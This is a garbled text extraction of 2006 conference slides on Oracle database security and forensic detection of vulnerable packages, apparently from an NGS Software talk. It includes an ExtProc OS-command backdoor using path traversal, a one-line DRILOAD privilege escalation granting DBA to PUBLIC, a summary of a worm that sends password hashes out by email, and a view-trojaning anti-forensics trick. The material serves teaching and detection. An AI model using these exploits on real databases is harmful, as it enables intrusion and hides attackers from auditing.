Oracle数据库安全讲义-by Paul Wright

NGS ConsultingNex t Gener tion S ity S oftware Lt Gener a tion S ec ur ity S oftware L td.Securing Oracle ForensicallySecuring Oracle ForensicallyPaul Wrighty pSecurity Software Developer and ConsultantOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.About myself ~ Paul M. Wright•University of Manchester Computer Scientist specialised in Oracle and security.• 6 years Oracle experience and 7 years security experience.•11 SANS conferences and most GIAC qualified person in the UK.•Pentest Ltd. Published the first paper on Oracle Forensics in January 20052005.•NGS Software for the last year writing security checks for Oracle Software working with David Litchfield.S ft ki ith D id Lit hfi ld•First GSOC with the highest marks so far ~ Peter Finnigans course.•This latest work is an extension of the Oracle Forensics Paper for the GSOC qualification and I think it may be of interest to ISACA.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Plan of presentation•General database security•Oracle database security•PLSQL packages and SQL Injection•Identifying easy vulnerabilities•Patching problemsy g y p•Trying to Identify vulnerable procedures•Identify vulnerable packages forensically•Assessing risk to zero days retrospectivelyg y p y•QuestionsOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Some prior researchabout yourselvesFinancial sectorgauditing andconsultancyNex t Gener a tion S ec ur ity S oftware L td.Oracle Forensics at ISACAWhy Database Security?•Databases hold the most sensitive information in a company. Whether this is Financial, Medical or HR information, the database is the ultimate target of ahacker. Crown Jewels. Credit card numbers for instance.•Privilege models in Databases are less evolved in DBs so difficult to managee.g. Privilege inheritance with nested roles and No explicit deny in Oracle onlyrevoke.D t bdfi i l l t kb il i•Databases are used for increasingly complex tasks, as business logic moves from the middle tier to the database, and support for full programming languages such as Java and C is added. Therefore more vulnerabilities.•Thin client desktop moves to the database. More access to DB.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Introduction --NGSIntroductionNGS and Database Security•NGS started in 2001, and much of the research was focused on databaseNGS started in 2001 and much of the research was focused on databasevulnerabilities, as this was expected to be the a growth area within IT Security.•In 2001, Oracle 9i was released, containing over 400 new features and the campaign slogan Unbreakable. I was working as an Oracle developer at Linn Products at theslogan “Unbreakable” I was working as an Oracle developer at Linn Products at thetime and had the word unbreakable on top of my monitor. David Litchfield broke it andnow I work for him.•In 2002 NGS developed vulnerability scanning tools for Oracle and MSSQL databases In 2002, NGS developed vulnerability scanning tools for Oracle and MSSQL databases.•Following further successes in database research and advisories released, NGS now has comprehensive scanning tools for DB2, Informix and SybaseOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Why Oracle Security now?•Core database has been secure ~ Oracle’s pride•The Alter session variable bug affected the whole DB and so dented this pride.•Also Oracle criticised David Litchfield for presenting a fix in the absence of any other fix (mod_plsqlgateway). Difficult to justify?•Gartner. Oracle is no longer the bastion of security.G t O l i l th b ti f it•I am interested in the technical rather than political media side.media sideNex t Gener a tion S ec ur ity S oftware L td.Oracle Forensics at ISACALocating, Analysing and mitigating Threats ~A generic process•Locate the database instances on a network ~Port scanning nmap A generic process Locate the database instances on a network Port scanning nmap •Run vulnerability audits similar to standard vulnerability assessment tools ~ Vulnerability scanner like NessusR n SQL scripts on the database to determine internal threats •Run SQL scripts on the database to determine internal threats•Place vulnerabilities in a business context during report and analysis •Secure vulnerabilities through patching, revoking access, or removing the affected resourceOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Top 8 threats that occur in a database?1.Default or Weak Passwords2.Privilege Abuse no explicit deny priv only revoke a2Privilege Abuse–no explicit deny priv only revoke a grant.3.Buffer Overflow and Format String3u e O e o a d o a S gwork Communication vulns5.Reading & Writing Arbitrary System FilesReading&Writing Arbitrary System Files6.SQL Injection7.Breaking out of the Database7Breaking out of the DatabaseOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.SQL Injection in Oracle•SQL Injection alternatively known as insertion means that the user can add their own SQL to the SQL that is being run. This is usually due to poor input validation. For example in a PLSQL package:•In Oracle, when a PL/SQL procedure executes, it does so with the permissions of the definer unless the AUTHID CURRENT USER keyword has been specified, in which case it is executed as the invoker.Definer issimilar to SUID in UNIX OS.•If PUBLIC ROLE has execute on the package, is definer rights and is owned by SYS then SQL injected by PUBLIC will run with the privileges of SYS.•There are many packages that fit this bill which is one of the reasons why over 300 injection vulnerabilities have been found in Oracle recently (2004-2006)Imagine a unix OS where scripts are SUID by default!(maybe 300+ SQL Injection bugs is not so surprising…)Nex t Gener a tion S ec ur ity S oftware L td.Oracle Forensics at ISACABreaking out of the DatabaseOracle OS Compromise•Oracle follows a very similar pattern, although this time the ExtProc service is used and the privileges requiredare CREATE LIBRARY. ExtProc is responsible for providing an interface between the database and anyp p g y external stored procedures –in this case, our backdoor procedure.CREATE OR REPLACE LIBRARY exec_shell AS‘$ORACLE_HOME\bin\..\..\..\..\..\..\..\C:\winnt\system32\msvcrt.dll ';/CREATE OR REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR);end oracmd;/CREATE OR REPLACE PACKAGE BODY oracmd IS CREATE OR REPLACE PACKAGE BODY oracmd ISPROCEDURE exec(cmdstring IN CHAR)IS EXTERNALNAME "system" LIBRARY exec_shell LANGUAGE C;end oracmd;Notice Oracle tries to stop us loading a library from anywhere outside its $ORACLE_HOME…and notice th ith hi h b it t l tt k!the ease with which we bypass it –a traversal attack!Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Breaking Out of the DatabaseOracle has a number of standard packages that could be used by an attacker to move from one database to another.UTL_TCP, UTL_HTTP and UTL_SMTP.UTL_TCP in particular would make this very easy to do. The key action is:UTL_TCP.OPEN_CONNECTION(HOST, TCP_PORT)In package:SYS.UTL_TCP.CONNECTION…which allows for arbitrary connections to hosts and ports.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Database WormsThe Voyager PoC Worm -analysis•Locate a default username and password within theL t d f lt d d ithi thdatabase•Use the CTXSYS.DRILOAD.VALIDATE STMT exploit to_pescalate the user to DBA•Use UTL_SMTP to send the Oracle password hashes tolarry@larry@oracle com•Use UTL_TCP to locate further vulnerable databases on the networkOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Violating the Oracle privilege model ––with one line of SQL!Violating the Oracle privilege model1.The DRILOAD package on Oracle 8i/9i (all versions) contains the procedureVALIDATE_STMT, which is used to test the validity of an SQL StatementVALIDATE STMT which is used to test the validity of an SQL Statementprovided.2.In the process of validating it the statement is…EXECUTED!3.The package can be run by a low privileged userThe package can be run by a low-privileged user4.So the following statement would promote all users to database administrators:exec CTXSYS.DRILOAD.VALIDATE_STMT('GRANT DBA TO PUBLIC');Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Code Injection within Database ResourcesThe package was updated in Alert 68 but how do we know whether we are vulnerable: Easy!SELECT OWNER,PACKAGE_NAME FROM ALL_ARGUMENTSSELECT OWNER PACKAGE NAME FROM ALL ARGUMENTS WHEREOWNER='CTXSYS' ANDPACKAGE_NAME='DRILOAD' ANDOBJECT_NAME='VALIDATE_STMT';no rows selectedl t dThe vulnerable procedure has been dropped by a Patch. If it is there you are vulnerable. EASY..but what about if the vulnerable yprocedure is simply modified by a Patch. How do you detect thevulnerable version of the procedure. Patch Level should tell us.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Patch Activity ~ OPatch•Oracle patching system has had problems•DBA historically encouraged to use pen and paper•I found a vulnerability in OPatch where it incorrectly identifiedI f d l bilit i OP t h h it i tl id tifi dthe location of the inventory file. OPatch relies on filepermissions to secure the file which cannot be done if thelocation is not known.•Inventory system has been unreliable especially to rollback•Inventory can be bypassed anyway.Inventory can be bypassed anyway•Being able to read patches shows diligence of DBA but not actual vulnerability. Need to identify the contents of the package.Our software uses low level technique to ascertain patch levelby reading from the OS but problem. OS access??Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.But what if we are dealing with an updated package ~ what then ?•Could identify avulnerable version ofthis package using athi k itool like Repscan.Takes an MD5sum•Takes an MD5sumof the state of thepackage at that timepackage at that timeand records it forfuture comparison.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Not forensically sound•Could calculate MD5 directly using Oracles built in function dbms_obfuscation_toolkit.md5•Repscan is better in that it it implements its own MD5 rather Repscan is better in that it it implements its own MD5ratherthan relying on Oracles but it is not forensically sound.•Could replace the MD5 hash with a collision using a tool like Stripwire by Dan Kaminsky 2004.•Repscan does not use file sizes to verify the file integrity which would alleviate the above threat.would alleviate the above threat.•Also does not use timestamps at all. Forensics correlates all information sources to deduce a more accurate conclusion.From Latin Forensis ~ of the forum ~ open debate which linkedF L ti F i f th f d b t hi h li k dto court of law. Forensics techniques being used in relatedareas such as corporate governance and risk.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Checksum and File size is more accurateSELECT OWNER,NAME FROM DBA_SOURCEWHEREOWNER='WKSYS' ANDNAME='WK_ACL' ANDTEXT LIKE '%a6764557%‘(David Litchfield -2005)Blue is checksum and green is file sizeIf this query returns true you are vulnerable on 10g. If not then you are not vulnerable.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Database Vulnerability ScannersDatabase Vulnerability Scanners ––NGSSquirrel for OracleOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.PunchlineProblem is that it does not tell how long have not been vulnerable for. Maybe DBA has just patched.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Correlating Timestamp, file size and checksum•Time is Forensically useful informationSQL> exec sys.dbms_aq_inv.purge_persistent_scq_table('aaa','aaa',‘a''a');y_q_p g_p_q_() BEGIN sys.dbms_aq_inv.purge_persistent_scq_table('aaa','aaa','a''a'); END; *ERROR at line 1:ORA-01756: quoted string not properly terminatedORA-06512: at "SYS.DBMS_AQ_INV", line 566ORA-06512: at line 1•SQL> SELECT OWNER, NAME FROM DBA_SOURCE WHERE__OWNER='SYS' AND NAME='DBMS_AQ_INV' AND TEXT LIKE'%786e 1907%';•OWNER NAME•------------------------------------------------------------•SYS DBMS_AQ_INVOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Forensic check•select last_ddl_time from dba_objects where object_name in (SELECT NAME FROM DBA_SOURCE WHEREOWNER='SYS' AND NAME='DBMS_AQ_INV' AND TEXT LIKE%786e 1907%);'%786e1907%');•LAST_DDL_TIME•---------------30AUG05•30-AUG-05•30-AUG-05•What use is this?•Can be used to retrospectively calculate the time that thepackage has been vulnerable which can be used as a metric ofrisk.i k•Also this information can be used to infer patch activity when there are many of these queries put together.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Retrospective zeroRetrospective zero--days•Using this technique we can calculate a past period of time that the DB has been vulnerable for.•Time from exploit code being released till patch =A•Time from patch release till last_ddl_time=B•Severity of the vulnerability =c•Risk calculation including severity could besomething like..•(2xA + B) X C = RISKOracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Knowing what you are vulnerable to and knowing what you havebeen vulnerable to•Knowing what you have been vulnerable to is ameasure of the risk you have been under.•You may have had an incident and not known it.•Reverse engineering Patches helps Security people know what has been fixed internal to the vendor.•Most vulns are now not disclosed vulnerabilities.•To know the risk you have been put under need to realise this.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Oracle Antiforensics ––what if a rootkit has been used ?Oracle Antiforensics•Most Enterprise administration tools use database views to display users, audit logs etc because they are moredisplay users audit logs etc because they are moreconvenient and information is better ordered than theunderlying tables.•But views are not tables! They are actually SQL whichselects the appropriate information from tables…•So what happens if you include trojan code in that SQL?You So what happens if you include trojan code in that SQL? Youcould append where user != ‘hacker_user’to the SQL in theview wherever it selects users from the user table.Then the rogue user disappears from the EnterpriseTh th di f th E t iManager.CUREÆuse base tables instead of views.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.Check the DB forensically through the OS layer.¾Use known good hashes of Oracle OS files toascertain forensically sound information aboutt i f i ll d i f ti b tthe state of the packages¾This will give the hash of the .plb file butThis will give the hash of the plb file butremember this is not what is actually in the dbmemory as this is found from dba_source.¾There is also the opportunity to recover files inthe OS that are from the oracle datafiles whichwill recover deleted data from oracle.will recover deleted data from oracle¾Forensics involves correlation of all the data:¾include, checksum, timestamp and file size.include,checksum,timestamp and file size.Oracle Forensics at ISACANex t Gener a tion S ec ur ity S oftware L td.•New Book on Oracle Forensics By the Presenter Paul M. Wright on its way.•/menu_oracle.htm•Will contain more detail on Oracle Forensicsconcepts expanding on the first Oracle Forensicspaperhttp://www giac org/certified professionals/practicals/gcfa/0159php•/certified_professionals/practicals/gcfa/0159.php•Questions please.NGS ConsultingNex t Gener tion S ity S oftware Lt Gener a tion S ec ur ity S oftware L td.References:/papers/DBMS_ASSERT.pdf/papers/HackproofingMySQL.pdf/papers/violating_database_security.pdf/papers/advanced_sql_injection.pdf/papers/more_advanced_sql_injection.pdf/papers/sqlinference.pdf/papers/hpoas.pdfFor more information visit our website at Copyright © 2006. Next Generation Security Software Ltd.。